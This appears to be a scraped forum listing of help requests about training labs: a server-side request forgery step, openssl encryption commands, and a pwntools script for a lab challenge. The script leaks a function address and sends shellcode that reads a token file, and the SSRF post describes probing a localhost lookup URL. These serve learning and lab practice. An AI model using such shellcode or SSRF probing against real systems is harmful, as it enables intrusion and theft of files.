application security
31 TopicsServer-Side Request Forgery
I need help with step 5 and 6 of Server-Side Request Forgery lab. I was able to find the location of potential SSRF i.e "lookup?url=http://localhost:3000/online" after that I have tried directory traversal and other methods in place of HTTP (FTP). Nothing seems to working to get the bot name/service accountSolved302Views1like4CommentsModern Encryption: Demonstrate your skills
I am in the final lab of this collection and the step 3 I need to encrypt the file using aes 256 encryption using the following command and similar other commands I am using for setup 4 & 5 however the commands execute succesfully and a encrypted file is generated however a key file is not generated to decrypt the remaining for encrypted file to complete the lab. I need the help to solve this lab and get the badge. step 3- openssl enc -aes-256-cbc -a -pbkdf2 -nosalt -in plaintext_1.txt -out plaintext_1.enc step 4- Encrypt a file using RC4 openssl enc -rc4 -d -pbkdf2 -nosalt -in plaintext_2.txt -out plaintext_2.enc step 5- Encrypt a file using RC4 openssl enc --des-ede3-cbc -d -pbkdf2 -nosalt -in plaintext_3.txt -out plaintext_3.enc130Views1like5CommentsNeed Help for Pwntools: Ep. 6 — Demonstrate Your Skills
I'm trying to solve an lab in Immersive labs Pwntools: Ep. 6 — Demonstrate Your Skills And I got stuck in the last step. I've tried the solution for using cat2 (from https://www.reddit.com/r/immersivelabs/comments/1ap3tub/pwntools_ep_6_demonstrate_your_skills/) but it is still not working. Could you please help me with this if possible shellcode = shellcraft.cat2("/home/token-user/token.txt", 1, 40) + shellcraft.ret(0) is what I tried from pwn import * import struct # Start the challenge binary p = process("/opt/demonstrate-challenge") # Use the correct path # === Part 1: Solve Arithmetic Challenge === p.recvuntil(b"What is the sum of ") numbers = p.recvline().decode().strip().split(" and ") num1 = int(numbers[0]) num2 = int(numbers[1].split("?")[0]) print(f"[+] Solving: {num1} + {num2} = {num1 + num2}") p.sendline(str(num1 + num2)) # === Part 2: Solve Packing Challenge === p.recvuntil(b"Send me back the following two 32-bit unsigned integers packed in little-endian order:\n") values = p.recvline().decode().strip().split(" and ") val1 = int(values[0]) val2 =int(values[1]) print(f"[+] Packing values: {val1} and {val2}") payload = struct.pack("<II", val1, val2) p.send(payload) # === Part 3: Leak Address of parsing_check() === elf = ELF("/opt/demonstrate-challenge") # Load the ELF binary parsing_check_addr = elf.symbols['parsing_check'] # Get function address print(f"[+] Found parsing_check() address: {hex(parsing_check_addr)}") p.sendline(str(parsing_check_addr)) # === Part 4: Send Shellcode to Read /home/token-user/token.txt === file_path = '/home/token-user/token.txt' shellcode = shellcraft.cat2(file_path, 1, 40) # Pwntools shellcode shellcode += shellcraft.ret() # Ensure proper return assembled_shellcode = asm(shellcode) p.send(assembled_shellcode) # === Get Flag Output === response = p.recvall() print(response)136Views1like11Comments